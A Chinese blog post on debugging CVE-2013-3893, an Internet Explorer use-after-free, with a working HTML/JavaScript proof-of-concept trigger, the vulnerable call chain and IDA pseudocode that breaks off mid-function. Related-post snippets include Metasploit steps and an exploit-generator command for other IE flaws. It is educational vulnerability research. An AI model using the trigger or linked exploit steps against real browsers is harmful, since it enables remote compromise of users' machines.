IE漏洞调试之CVE-2013-3893

最新推荐文章于 2022-09-09 23:27:00 发布
最新推荐文章于 2022-09-09 23:27:00 发布
阅读量197 收藏
点赞数
文章标签: 运维

前言

Windows平台的漏洞挖掘和安全研究中,IE始终是绕不开的话题。IE漏洞就跟adobe系列一样经典,是学习exploit、shellcode的绝佳途径。

在IE漏洞中,UAF即Use-After-Free是最为经典的一类。UAF可以这样简单理解:A先后调用B、C、D三个子函数,B会把A的某个资源释放掉;而D由于判断不严谨即使在B把A的资源释放后依然去引用它,比如某个指针,这时D引用了很危险的悬空指针;C是个什么角色呢?我们可以通过B分配数据。所以利用方法来了:构造奇葩的数据,让A调用B,B把A的某个指针释放掉;接着执行C,C赶紧分配内存,企图使用刚才释放掉的内存,同时我们可以控制这个内存;最后D被调用,由于检查不严格调用了已经释放掉的某指针,而该指针实际上已经被我们重用并且扭曲。漏洞被利用。

但是学习IE的资料非常少,已知的大都是大牛们逆向mshtml.dll来的,辛辛苦苦得来的东西也不方便马上透露出来,所以自力更生是很重要的。我们希望了解IE运行机制,自己fuzz并找到有价值的漏洞。与此同时,能够调试已公布的漏洞,学习已有的POC,也是很重要的能力。所以这里选择CVE-2013-3893这个经典的UAF来学习IE漏洞的调试。

工具

windbg、ida、各版本IE程序、xp/vista/win7/win8虚拟机

windbg用于动态调试;IDA用于静态分析mshtml.dll——实现IE解释器的dll;各版本IE和windows是必不可少的。 

基础知识

出现一个新的漏洞,涉及到的解析过程我们并不一定分析过,所以分析漏洞的同时也是学习浏览器机制的好机会。比如CVE-2013-3893这个漏洞,我们需要了解CTreeNode和元素的关系以及几个关键的函数实现。具体的结合POC和调试过程分析。 

POC

<html>
<script>
function trigger() {     Math.tan(3,4);     var id_0 = document.createElement("sup");     var id_1 = document.createElement("audio");     Math.sin(0);     document.body.appendChild(id_0);     document.body.appendChild(id_1);     Math.cos(0);     id_1.applyElement(id_0);     Math.tan(3,4);     id_0.onlosecapture=function(e){         document.write("");     }     Math.sin(0);      id_0[‘outerText’]="";     Math.cos(0);     id_0.setCapture();     Math.tan(3,4);     id_1.setCapture();     Math.sin(0); } window.onload = function() {     trigger(); } </script> </html>

调试技巧

用windbg载入IE时设置jscript!tan、jscript!sin、jscript!cos断点,逐语句分析。也可以将POC页面设置为IE主页,便于直接载入。结合IDA对mshtml.dll分析相关函数。 

漏洞原理

id_1.setCapture时,进入CDoc::PumpMessage;获取Element的TreeNode,调用CDoc::ReleaseDetachedCaptures();参数为0调用CDos::SetMouseCapture,进入CDos::ClearMouseCapture,调用CElement::FireEvent,触发事件导致id_0.onlosecapture指定的js函数调用,document.write(“”),该函数将所有对象释放CBodyElement的CTreeNode也被释放。然后返回PumpMessage,CDos::HasContainerCapture被调用,它引用了释放的CTreeNode对象。UAF发生。看下面IDA静态分析的代码。

int __userpurge CDoc::SetMouseCapture<eax>(int a1<eax>, LPVOID lpMem, int a3, int a4, int a5, int a6, int a7) {   int v7; // ebx@1   int flag; // edi@1   int result; // eax@3   int v10; // esi@9   int v11; // ecx@16   int v12; // eax@22   int v13; // ST14_4@28   char v14; // [sp+10h] [bp-98h]@21   int v15; // [sp+14h] [bp-94h]@21   int v16; // [sp+A4h] [bp-4h]@5   void *lpMema; // [sp+B0h] [bp+8h]@7     v7 = (int)lpMem;   flag = a1;   if ( *((_WORD *)lpMem + 938) & 0x1000 )     flag = 0;   if ( flag )   {     v16 = (*((_DWORD *)lpMem + 65) >> 2) - 1;     result = v16;     if ( v16 < 0 )       goto LABEL_33;     v11 = *((_DWORD *)lpMem + 67) + 4 * v16;     do     {       if ( *(_DWORD *)(*(_DWORD *)v11 + 8) == flag )         break;       --result;       v11 -= 4;     }     while ( result >=
weixin_34112208
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2013-3893 IE浏览器UAF漏洞分析
wuliang的博客
04-11 814
CVE-2013-3893 IE浏览器UAF漏洞利用 漏洞成因 CVE-2013-3893发生原因是浏览器中函数SetMouseCapture()在事件响应中处理了一个已经被释放的引用而导致了Use-After-Free型漏洞的发生。该漏洞IE6-11版本全覆盖。本次利用是windows xp sp3环境下的IE8版本中进行。 详情描述 首先创建两个元素。 利用document.body....
CVE-2013-3893
weixin_30564785的博客
08-22 167
前方高能!!!这篇博文比较长,因为我把完整的调试过程都记录下来了,感兴趣的童鞋可以看下。没有耐心的童鞋可以直接跳到最后看总结:)   Microsoft Internet Explorer 远程代码执行漏洞(CNNVD-201309-304) Internet Explorer(IE)是美国微软(Microsoft)公司开发的一款Web浏览器,是Windows操作系统附带的默认...
IE漏洞调试心得
weixin_30633949的博客
08-17 108
调试漏洞的过程中,个人感觉最棘手的就是ie浏览器的漏洞和flash player的漏洞了。这里打算记录一下学习过程中的心得(主要是基于uaf类),以方便新人学习。 首先,ie漏洞与众不同的是,程序的执行流程是由攻击者控制的。poc中的js脚本反应到mshtml中的c++代码决定了程序的执行流程,所以对于ie漏洞来说仔细研究poc非常的关键。此外就是调试ie漏洞需要对ie本身有很强的了解,这也是...
IE浏览器 CVE-2018-8174漏洞复现
weixin_44664530的博客
04-23 398
漏洞介绍 CVE2018-8174这个漏洞是针对ie浏览器的一个远程代码执行漏洞 复现环境 kali win7 复现 克隆文件 git clone https://github.com/Sch01ar/CVE-2018-8174_EXP 生成 python CVE-2018-8174.py -u http://192.168.31.117/exploit.html -o exploit.rtf...
浏览器漏洞调试技巧记录
weixin_42539095的博客
12-16 158
windbg 打开堆调试开关: C:\Windows\system32>gflags.exe /i iexplore.exe +hpa -ust 限制对 JScript.dll 的访问 对于 32 位系统,在管理命令提示符处输入以下命令: takeown /f %windir%\system32\jscript.dll cacls %windir%\system32\jscript.dll /E /P everyone:N 对于 64 位系统,在管理命令提示符处输入以下命令: takeo
CVE-2013-6117:CVE-2013-6117
04-29
CVE-2013-6117 $ ./CVE-2013-6117 -hOptions: -h, --help display help information -f, --filename File containing list of IP addresses -t, --target Target IP -n, --threads No of concurrent threads ...
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
本篇将详细讨论如何修补OpenSSH中的几个已知漏洞,包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。 首先,让我们了解这些特定的漏洞: 1. CVE-2020-15778:这是一个与OpenSSH密钥协商过程相关的漏洞,可能...
OpenSSH 资源管理错误漏洞(CVE-2021-28041)
06-22
然而,OpenSSH 也存在一些安全漏洞,其中之一就是资源管理错误漏洞(CVE-2021-28041)。本文将详细介绍该漏洞的成因、影响、解决方案及升级 OpenSSH 和 OpenSSL 的步骤。 一、漏洞成因 OpenSSH 资源管理错误漏洞(CVE...
IE-CVE收集
墨鱼菜鸡
09-09 102
最近工作需要分析IE的cve,这里是看过的比较好的文章分析 CVE-2012-1876 分析文章 分析文章 CVE-2014-6332 分析文章 分析文章 CVE-2016-0189 分析文章 CVE-2018-8174 分析文章 分析文章 CVE-2018-8373 分析文章 ...
利用IE浏览器漏洞入侵
weixin_45511599的博客
10-13 1259
目的:利用ie浏览器的aurora漏洞获得目标shell权限 实战: 1.开启渗透利用框架 msfconsole 2.搜索这个漏洞(代号 ms10-002) search ms10-002 3.使用搜索出的攻击模块 use exploit/windows/browser/ms01_002_aurora 4.显示要设置的参数 show options 5.设置参数(kali ip) set SRVHOST 192.168.1.176 set SRVPORT 8080 set URIPATH
被玩坏的IE浏览器——漏洞利用方法和技巧介绍
systemino的博客
06-04 2548
0x01 基本介绍 自1995年以来,Internet Explorer一直是Microsoft Windows操作系统的核心部分。尽管正式停止了对Edge浏览器的进一步开1发,但由于其持续使用的情况,Microsoft会继续发布补丁程序。当前的统计数据估计,大约有4%的Internet用户仍在使用Internet Explorer,因此与Opera等浏览器相比,其用户群仍在不断扩大。 https://www.w3counter.com/trends 写这篇文章目的通过研究如何利用其中的漏洞(如U.
IE UAF 漏洞CVE-2012-4969)漏洞分析与利用
giantbranch的专栏
04-05 5278
简介 这是一个UAF的漏洞 实验环境 Windows 7 Sp1 32位 IE 8 windbg IDA mona 漏洞分析 搜了一下metasploit那里有,于是就直接生成exp咯 msf > search CVE-2012-4969 Matching Modules ================ Name
CVE-2018-8174 IE浏览器远程代码执行漏洞
锋刃科技的博客
11-03 5970
0x00漏洞简介 在2018年5月9日的时候360发表了一份apt攻击分析及溯源报告 文中提到了cve-2018-8174这个漏洞的首次在apt方面的应用 原文地址:http://www.4hou.com/vulnerable/11441.html CVE2018-8174这个漏洞是针对ie浏览器的一个远程代码执行漏洞 CVE地址:http://cve.mitre.org/cgi-bin/...
漏洞复现】IE 浏览器远程代码执行漏洞CVE-2018-8174)
VI___
01-06 1370
一、CVE-2018-8174(本质是 Windows VBScript Engine 代码执行漏洞) 由于 VBScript 脚本执行引擎(vbscript.dll)存在代码执行漏洞,攻击者可以将恶意的 VBScript 嵌入到 Office 文件或者网站中,一旦用户不小心点击,远程攻击者可以获取当前用户权限执行脚本中的恶意代码,该漏洞影响最新版本的IE浏览器及使用了 IE 内核的应用程...
(环境搭建+复现) CVE-2020-0674 IE远程代码执行漏洞
daxi0ng的博客
04-05 2913
1、【CVE编号】 CVE-2020-0674 2、【漏洞名称】 IE远程代码执行漏洞 3、【靶标分类】 Web浏览器类型靶标 4、【影响版本】 Internet Explorer 10 Windows Server 2012 Internet Explorer 11 Windows 10 Version 1803 for 32-bit Systems Windows 10 Version 180...
IE浏览器远程代码执行高危漏洞(CVE-2019-1367)
WY92139010的博客
09-30 1364
IE浏览器远程代码执行高危漏洞(CVE-2019-1367)加固遇到的问题 一、背景介绍 Internet Explorer,是微软公司推出的一款网页浏览器。用户量极大。9月23日微软紧急发布安全更新,修复了一个影响IE浏览器的远程代码执行漏洞。由谷歌威胁分析小组发现此漏洞,据称该漏洞已遭在野利用。 二、漏洞描述 此漏洞是由InternetExplorer脚本引擎中处理内存对象...
CVE-2013-2768 漏洞利用
最新发布
07-28
很抱歉,但是根据提供的引用内容,我没有找到关于CVE-2013-2768漏洞的相关信息。请确认是否有其他引用内容提供了相关信息。如果有,请提供相关引用内容,我将尽力回答您的问题。 #### 引用[.reference_title] - *1* ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值